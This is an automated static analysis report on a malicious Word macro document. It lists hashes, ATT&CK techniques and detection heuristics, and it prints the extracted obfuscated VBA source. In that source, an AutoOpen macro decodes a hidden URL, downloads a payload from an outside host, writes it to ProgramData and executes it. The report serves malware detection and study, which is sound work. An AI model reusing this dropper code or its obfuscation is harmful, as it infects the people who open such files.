Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d5f3e5ea9c3b7afb…

MALICIOUS

Office (OOXML)

Size: 134.7 KB
Created: 2020-07-09 00:04:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-09-15
MD5: 9cb97948976169d1e16815a61ba64c8d
SHA-1: 2e5689803f3682cadf1a8a607d3644d16209689b
SHA-256: d5f3e5ea9c3b7afb3c4dd818b1807986e73236d6b3b50214d7ad908ac094e81c
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is an OOXML document containing a VBA project with an AutoOpen macro. This macro is configured to execute a shell command, indicating an attempt to download and run a secondary payload. The presence of an external relationship pointing to a local file path is suspicious and may be part of the payload delivery mechanism.

Heuristics (5)

  • External relationship (severity: high, OOXML_EXTERNAL_REL)
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack2\it.jpg
  • VBA project inside OOXML (severity: medium, 2 related findings, OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • AutoOpen macro (severity: high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (severity: high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (severity: info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename   Kind   Source   Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4913 bytes
SHA-256: 7aede3cc6066d260e150b5b68eac15e30ab95ef54a538aa89e72a77c798f5098
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fd04a0c9"
Function e70d573d()
e70d573d = 115
End Function
Function a7ebcbfa()
a7ebcbfa = Application.ActiveDocument.AttachedTemplate
End Function
Function b4dbedd1()
b4dbedd1 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function cbe53580()
cbe53580 = Application.ActiveDocument.Creator
End Function
Sub dcf6688e(f350434d, e2773b0e)
Dim cb792a08
cb792a08 = FreeFile
Open f350434d For Output As #cb792a08
Print #cb792a08, aa8c3adf(e2773b0e)
Close #cb792a08
End Sub
Function ddaf8864()
ddaf8864 = ActiveWindow.EnvelopeVisible
End Function
Function d8da2402() As Long
Dim a00d09d5 As Integer
Dim b7b5c4bb As Long
b7b5c4bb = 217
For a00d09d5 = 32 To 75
b7b5c4bb = b7b5c4bb - a00d09d5
Next a00d09d5
d8da2402 = b7b5c4bb
End Function
Function cae3a3e1()
cae3a3e1 = 7274.1088222074
End Function
Function fb539e93()
fb539e93 = ActiveWindow.DocumentMap
End Function
Function e6f9dcf0(c09dd58e)
a5961324 = Len(c09dd58e)
For cb0c6ec1 = 1 To a5961324 Step 2
c889e0ed = c889e0ed & Mid(c09dd58e, cb0c6ec1, 1)
Next
e6f9dcf0 = c889e0ed
End Function
Function d0ad469f()
d0ad469f = Application.ActiveDocument.AutoSaveOn
End Function
Function f82242ef()
f82242ef = ActiveWindow.WindowState
End Function
Function bd98885b()
bd98885b = ActiveWindow.Split
End Function
Function f9c93bf5()
f9c93bf5 = Application.ActiveDocument.AutoHyphenation
End Function
Sub a4e59db5()
End Sub
Function c9e0bbc4()
c9e0bbc4 = ActiveWindow.HorizontalPercentScrolled
End Function
Function d5258384()
d5258384 = ActiveWindow.Index
End Function
Function ada00e74()
ada00e74 = True
End Function
Function ddc1ff1c()
ddc1ff1c = ActiveWindow.View
End Function
Sub AutoOpen()
Dim ecd32534 As New a015b50a
dcf6688e e6f9dcf0("c5:a\dp1r6o5g9r8admbd2aet7a0\85a3b0f1b0e.aj2p5gd"), ecd32534.e07df3f5(e6f9dcf0("h1tdt6pf:d/e/ehbq13dl8l0.8c6o8m6/8ifz158/4ycadc3a3.6pfhdp9?ele=fk3p2t41a12.dcbabbd"))
Dim b42370f8 As New WshShell
b42370f8.exec ea288f1c & " " & e6f9dcf0("c5:a\dp1r6o5g9r8admbd2aet7a0\85a3b0f1b0e.aj2p5gd")
End Sub

Attribute VB_Name = "ffa9cef4"
Function bd788388()
bd788388 = ActiveWindow.Selection
End Function
Function ca4877b8()
ca4877b8 = ActiveWindow.HorizontalPercentScrolled
End Function
Function c7929515(f86a7ea9 As Long) As Long
Dim a4415cfb As Long
For a4415cfb = 39 To 93
f86a7ea9 = f86a7ea9 - a4415cfb
Next a4415cfb
c7929515 = f86a7ea9
End Function
Function e19b7643()
e19b7643 = 964909800 / 21022
End Function
Function aa8c3adf(b3422104)
aa8c3adf = StrConv(b3422104, 64)
End Function
Function ef36f7ad()
ef36f7ad = ActiveWindow.VerticalPercentScrolled
End Function
Function d4c07551()
d4c07551 = ActiveWindow.Hwnd
End Function
Function ce319fe6(ae37276d As Long) As Long
Dim b9c8044f As Integer
For b9c8044f = 49 To 87
ae37276d = ae37276d + b9c8044f
Next b9c8044f
ce319fe6 = ae37276d
End Function
Function f8b4e6f9()
f8b4e6f9 = Application.ActiveDocument.ActiveTheme
End Function
Function e0738706()
End Function
Function ff43abc0()
ff43abc0 = ActiveWindow.Creator
End Function
Function d0b8d817(f5932e35np As String) As Boolean
If Len(f5932e35np) > 664 Then
d0b8d817 = False
End If
End Function
Function a7f4e88a()
a7f4e88a = Application.ActiveDocument.CompatibilityMode
End Function
Function c851d88b()
c851d88b = ActiveWindow.IMEMode
End Function
Function ea288f1c()
ea288f1c = e6f9dcf0("rce2gcs8v6r83626")
End Function

Attribute VB_Name = "a015b50a"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function f6109c52()
f6109c52 = ActiveW
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 29696 bytes
SHA-256: 4cd5a4b15b77be71ea7843367733c2e24af4f4b1e4589b03088733a4a7e8015b